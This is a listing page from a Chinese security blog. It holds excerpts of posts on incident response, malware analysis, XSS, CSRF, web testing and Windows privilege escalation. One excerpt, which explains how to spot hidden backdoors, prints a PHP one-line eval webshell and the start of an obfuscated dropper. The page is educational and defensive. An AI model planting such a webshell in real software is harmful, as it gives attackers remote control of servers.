摘要: 0x00 目录 关于目标环境的中间进度检测报告 一:情况概述 二:取证情况 2.1 目标网络情况 2.2 针对xxx服务器中间件的检测 2.3 针对xxx服务器进程及端口的检测 2.4 发现攻击者的攻击操作 三:溯源操作 3.1 关于攻击者的反向检测 四:攻击源确定 4.1 确定攻击入口处 五:安全 阅读全文
posted @ 2016-11-18 20:59 linuxsec 阅读(1504) 评论(0) 推荐(1) 编辑
摘要: 来自:wooyun 0x00 结论 14号上午接到同事报告,某主机cpu占用至100%并出现可疑进程,安全部接手调查后结论如下: 0x01 过程 分析过程如下: 登入主机后,找到可疑进程PID 进入proc/进程目录找到对应文件绝对路径在/usr/bin目录下,stat信息如下: 1 2 3 4 5 阅读全文
posted @ 2016-11-18 20:57 linuxsec 阅读(374) 评论(0) 推荐(0) 编辑
摘要: 来自:freebuf 对于安全工作者来说,木马既是我们的敌人,也是我们的“朋友”。甚至可以这样说,木马使我们进步,安逸使我们落后。这不,这位抗马新兵就不甘落后,分享了他的抗马记录。 刚工作不久就遭遇了3次木马攻击,第一是是root木马,控制服务器对阿里某云进行流量攻击,后两次是minerd木马攻击, 阅读全文
posted @ 2016-11-18 20:54 linuxsec 阅读(105) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2016-11-18 20:52 linuxsec 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen(chr(46).chr(47).chr(97)……省略 解码: 其中chr括号里面的数字是美国 阅读全文
posted @ 2016-11-18 20:49 linuxsec 阅读(222) 评论(0) 推荐(0) 编辑
摘要: 转载 hyber 近半年做了很多应急响应项目,针对黑客入侵。但疲于没有时间来总结一些常用的东西,寄希望用这篇博文分享一些安全工程师在处理应急响应时常见的套路,因为方面众多可能有些杂碎。 个人认为入侵响应的核心无外乎四个字,顺藤摸瓜。我们常常需要找到比较关键的信息后通过一些指令查询或者分析日志,逐步分 阅读全文
posted @ 2016-11-18 20:38 linuxsec 阅读(91) 评论(0) 推荐(0) 编辑
摘要: 1、启动器 启动器是一种设置自身或其他恶意代码片段以达到即时或将来秘密运行的恶意代码。启动器的目的是安装一些东西,以使恶意行为对用户隐藏。 2、进程注入 隐藏启动的最流行技术是进程注入。顾名思义,这种技术是将代码注入到另外一个正在运行的进程中,而被注入的进程会不知不觉地运行注入的代码。恶意代码编写者 阅读全文
posted @ 2016-11-18 20:33 linuxsec 阅读(1073) 评论(0) 推荐(0) 编辑
摘要: 1、下载器和启动器 常见的两种恶意代码是下载器和启动器。下载器从互联网上下载其他的恶意代码,然后在本地系统中运行。下载器通常会与漏洞利用(exploit)打包一起。下载器常用windows API函数URLDownloadtoFileA和WinExec,来下载并运行新的恶意代码。 启动器(也称为加载 阅读全文
posted @ 2016-11-18 20:32 linuxsec 阅读(711) 评论(0) 推荐(0) 编辑
摘要: 网络行为的基本属性包括IP地址、TCP与UDP端口、域名,以及流量内容等,网络和安全设备可以利用它们,来提供网络应对措施。 1、在原始环境中观察恶意代码 恶意代码分析的第一步不应该是在实验环境中运行恶意代码,也不应该是解刨恶意代码分析它的反汇编代码。与之相反的是,你应该首先查看已经获得的关于恶意代码 阅读全文
posted @ 2016-11-18 20:31 linuxsec 阅读(406) 评论(0) 推荐(0) 编辑
摘要: 1、windows 注册表 注册表根键 注册表被划分为下面5个根键 HKEY_LOCAL_MACHINE(HKLM) 保存对本地机器全局设置 HKEY_CURRENT_USER(HKCU) 保存当前用户特定的设置 HKEY_CLASSES_ROOT 保存定义的类型信息 HKEY_CURRENT_CO 阅读全文
posted @ 2016-11-18 20:29 linuxsec 阅读(196) 评论(0) 推荐(0) 编辑
摘要: 有几个功能一体化的软件产品,可以用来进行基本的动态分析,最流行的就是使用沙箱技术。沙箱是一种在安全环境里运行不信任程序的安全机制,不用担心伤害到“真正的”系统。 在计算机安全专业人士眼中,Norman沙箱和GFI沙箱是最受欢迎的。 1、如何成功启动DLL文件 在所有的windows版本中都包含run 阅读全文
posted @ 2016-11-18 20:27 linuxsec 阅读(436) 评论(0) 推荐(0) 编辑
摘要: 1、使用反病毒软件来确认程序样本的恶意性 在分析一个可疑的恶意代码样本时,第一步就最好是拿多个反病毒软件扫描下这个文件,看是否有哪个引擎已经能够识别它。反病毒软件是不完美的,它们主要依靠一个已知恶意代码可识别片断的特征数据库,以及基于行为与模式匹配的分析(启发式检测),来识别可疑文件。 一些罕见的恶 阅读全文
posted @ 2016-11-18 20:24 linuxsec 阅读(858) 评论(0) 推荐(0) 编辑
摘要: 1、恶意代码分析技术 恶意代码分析有两类方法:静态分析和动态分析。静态分析方法是在没有运行恶意代码时对其进行分析的技术,而动态分析方法则需要运行恶意代码,而这两类技术又进一步分析基础技术和高级技术。 1)、静态分析技术基础技术 静态分析基础技术包括检查可执行文件但不查看具体指令的一些技术。静态分析基 阅读全文
posted @ 2016-11-18 20:23 linuxsec 阅读(750) 评论(0) 推荐(0) 编辑
摘要: 1 什么是XSS跨站脚本 跨站脚本是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料盗取、会话劫持、钓鱼欺骗等各种攻击。 阅读全文
posted @ 2016-11-18 20:19 linuxsec 阅读(619) 评论(0) 推荐(0) 编辑
摘要: CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的。根据HTTP请求方式,CSRF利用方式可分为两种。 我们先来看看CSRF和XSS的工作原理,先让大家把这两个分开来。 XSS:攻击者 阅读全文
posted @ 2016-11-18 20:18 linuxsec 阅读(294) 评论(0) 推荐(0) 编辑
摘要: PhishTank 是互联网上免费提供恶意网址黑名单的组织之一,它的黑名单由世界各地的志愿者提供,且更新频繁。 1、XSS 1.1、 XSS简介 跨站脚本攻击,英文全称是Cross Site Script,本来缩写是CSS,但是为了和层叠样式表有所区分,所以在安全领域叫做“XSS”。 XSS攻击,通 阅读全文
posted @ 2016-11-18 20:14 linuxsec 阅读(751) 评论(0) 推荐(0) 编辑
摘要: 测试方法 1、Web应用安全测试 1.1、 Web应用安全测试概述 Web应用安全测试只侧重于评估Web应用的安全性。这个过程包括主动分析应用程序的所有弱点、技术缺陷和漏洞。任何被发现的安全问题连同影响评估、缓解建议或者技术方案一起提交给系统所有者。 1.2、 什么是OWASP测试方法 测试模型 测 阅读全文
posted @ 2016-11-18 20:08 linuxsec 阅读(1687) 评论(1) 推荐(0) 编辑
摘要: 来自bobao.360.cn 从t7到t10 - 撸起袖子大干一场 到现在这个阶段,我希望我们已经有了一个SYSTEM的shell,但是如果我们还没有,仍有一些其它的途径去获得SYSTEM权限。在这个最后的部分,我们将目光投向Windows的服务和文件及文件夹权限。我们的目标是使用弱权限(权限的错误 阅读全文
posted @ 2016-11-18 20:04 linuxsec 阅读(262) 评论(0) 推荐(0) 编辑
摘要: 来自bobao.360.cn 从t0到t3 - 信息搜集 一开始,我们拥有的帐号是一个没有特权的普通账号。假设我们已经在远程或者在本地利用EXP进行了一次攻击并且获得了一个反弹回来的shell。根本上说,在时间t0,我们不知道被攻击的机器是做什么的,它和谁进行连接,我们拥有怎样的权限,甚至它的操作系 阅读全文
posted @ 2016-11-18 19:59 linuxsec 阅读(402) 评论(0) 推荐(0) 编辑
摘要: 代码审计函数篇 addslashed() 添加反斜杠 stripslashed() 去掉反斜杠 get_magic_quotes_gpc() 判断是否开启gpc expode(".",$array) 分割成数组 is_numeric() 判断是否为数字 sizeof() 判断长度 trim() 去处 阅读全文
posted @ 2016-11-18 19:50 linuxsec 阅读(1832) 评论(0) 推荐(0) 编辑